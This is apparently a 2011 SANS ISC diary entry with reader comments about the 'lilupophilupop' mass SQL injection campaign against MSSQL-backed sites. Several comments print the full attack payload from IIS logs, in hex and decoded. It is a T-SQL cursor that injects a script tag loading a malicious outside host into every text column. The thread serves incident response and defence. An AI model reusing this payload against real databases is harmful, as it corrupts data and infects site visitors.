We've had several reports (thanks guys) of sites being injected with the following string: "></title><script src="hXXp://lilupophilupop. Typically it is inserted into several tables. From the information gathered so far it looks targeted at ASP, IIS and MSSQL backends, but that is just speculation. If you find that you have been infected please let us know and if you can share packets, logs please upload them on the contact form. Mark
UPDATE: Thanks to those that posted comments and those that worked behind the scenes. The injection string is along the lines Terry posted in his comments. the one I ran across is (note not the whole string is provided) 73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404 Which decodes to: declare+@s+varchar(4000)+set+@s=cast(0xset ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('------SNIP------- When discovered yesterday about 80 sites showed in Google, this morning about 200, by lunch 1000 and a few minutes ago 4000+. Targets include ASP sites and Coldfusion (Thanks Will) The attack seems to work on all versions of MSSQL. The hex will show in the IIS log files, so monitor those. Make sure that applications only have the access they require, so if the page does not need to update a DB, then use an account that can only read. Sources of the attack vary, it is automated and spreading fairly rapidly. As one of the comments mentioned it looks like lizamoon which infected over 1,000,000 sites earlier this year. The trail of the files ends up on "adobeflash page" or fake AV. Blocking access to the lilupophilupop site will prevent infection of clients should they hit an infected site and be redirected. Mark H - Shearwater |
Mark 391 Posts ISC Handler Dec 2nd 2011 |
Thread locked Subscribe |
Dec 2nd 2011 9 years ago |
Reminds me of LizaMoon...inject a stored XSS into the webapp's backend db...
|
Anonymous |
Quote |
Dec 1st 2011 9 years ago |
For those who want to use curl to play follow the bouncing malware, set the user agent string to a value used by a common browser, i.e --user-agent 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
If you don't do this, a 404 reponse is returned, but if the client looks like an ordinary browers, it will return a 200 reponse with a javascript redirect in the body. It looks like the bad guys may be tracking repeat visits from the same IP address since subsequet requests even with a common user agent receive a 200 OK header reponse, but there is not content. The interesting stuff appears to be at hxxp://www2.thebestbesentinel.rr.nu but that's as far as I've tracked it |
James 12 Posts |
Quote |
Dec 2nd 2011 9 years ago |
we were hit by this, here is the payload from IIS logs:
2011-12-01 17:12:08 W3SVC1505444441 OURIP GET /VALIDPAGE VALIDPARAM=0&VALIDPARAM=122+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29-- 80 - 78.46.28.97 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 200 0 0 set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="http://lilupophilupop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor? |
James 1 Posts |
Quote |
Dec 2nd 2011 9 years ago |
Yes, same here, the hex code in the access logs was
73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 |
James 2 Posts |
Quote |
Dec 2nd 2011 9 years ago |
The IP address it came from was:
96.9.149.76 - - [30/Nov/2011:15:42:17 -0500] |
James 2 Posts |
Quote |
Dec 2nd 2011 9 years ago |
It's a SQL Server exploit, not dependent on ASP and possibly not IIS either. It hit us and we're running Coldfusion.
|
James 1 Posts |
Quote |
Dec 2nd 2011 9 years ago |
Thanks Will, I updated the diary.
|
Mark 391 Posts ISC Handler |
Quote |
Dec 2nd 2011 9 years ago |
We got hit from IP 78.46.28.97 @ around 21:14 UTC yesterday - looks like the same hex dump - if you want entire entry from IIS log i can post - the hex dump you provided helped us find this attack vector in our logs to explain the symptoms we dealt with late yesterday- thank you!
|
Mark 1 Posts |
Quote |
Dec 2nd 2011 9 years ago |
Thanks for working on this guys...for those of us that aren't quite as clever, can you explain for the layperson how this attack happened and what, if anything, we can do to prevent it happening again?
We got hit first time on Friday morning (Australia time). I spent most of yesterday fixing what I could, and now we've been hit again, but in different tables. Thanks. |
Mark 2 Posts |
Quote |
Dec 2nd 2011 9 years ago |
There is an article I was reading just 10 minutes ago that describes the way the payload works:
http://blog.strictly-software.com/2009/10/two-stage-sql-injection-attack.html |
Mark 1 Posts |
Quote |
Dec 2nd 2011 9 years ago |
Wouldn't proper sanitation of input from the page prevent this from occurring?
|
bkendall 7 Posts |
Quote |
Dec 2nd 2011 9 years ago |
I see hits in our content filter touching the sl.php url back to 11/30.
|
Anonymous |
Quote |
Dec 2nd 2011 9 years ago |
See: http://blog.dynamoo.com/2010/10/evil-network-specialist-ltd-specialist.html
11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..." . |
Jack 160 Posts |
Quote |
Dec 2nd 2011 9 years ago |
So, this script destroys data on our SQL servers, but is not leaving any back doors open, right? Find the sloppy code and clean it up and it shouldn't happen again?
|
Jack 2 Posts |
Quote |
Dec 2nd 2011 9 years ago |
If you are a member of AUSCert they can help you find out he extent of the intrusion and how to proceed. But to answer your question yes it is probably bad code somewhere. Try something like burpsuite to help you run a scan of your sure. It won't find everything but should pick up on the issues things like this worm exploit.
|
Raymond 14 Posts |
Quote |
Dec 3rd 2011 9 years ago |
A preliminary fix: revoke select permissions from the SQL login your web code uses on information_schmata views (and probably also sysobjects, syscolumns in vulnerable DBs). Not airtight, but it makes this kind of attack more difficult to execute.
|
Raymond 1 Posts |
Quote |
Dec 3rd 2011 9 years ago |
Anyone have any transaction logs? lets figure out the insert/exec code that is being used. thats where we'll figure out how this whole thing works
|
Raymond 1 Posts |
Quote |
Dec 4th 2011 9 years ago |
See: Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691 "... The last time Google tested a site on this network was on 2011-12-04, and the last time suspicious content was found was on 2011-12-04... Over the past 90 days, we found 11 site(s) on this network, including, for example, lilupophilupop .com... that appeared to function as intermediaries for the infection of 6 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 1 site(s), including, for example, sweepstakesandcontestsnow .com... that infected 108 other site(s)..." . [ 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) ] . |
Jack 160 Posts |
Quote |
Dec 4th 2011 9 years ago |
2011-12-01 21:41:37
... ID=364+declare+%40s+varchar%284000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29--&allcount=715&dbeg=141|-|ASP_0113|Script_timed_out 80 - 78.46.28.97 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0) 500 0 0 |
Jack 1 Posts |
Quote |
Dec 6th 2011 9 years ago |
Does the title mean that there are ATMs which running Window OS are under the attack of this SQL injection?
|
Jack 1 Posts |
Quote |
Dec 6th 2011 9 years ago |
Sign Up for Free or Log In to start participating in the conversation!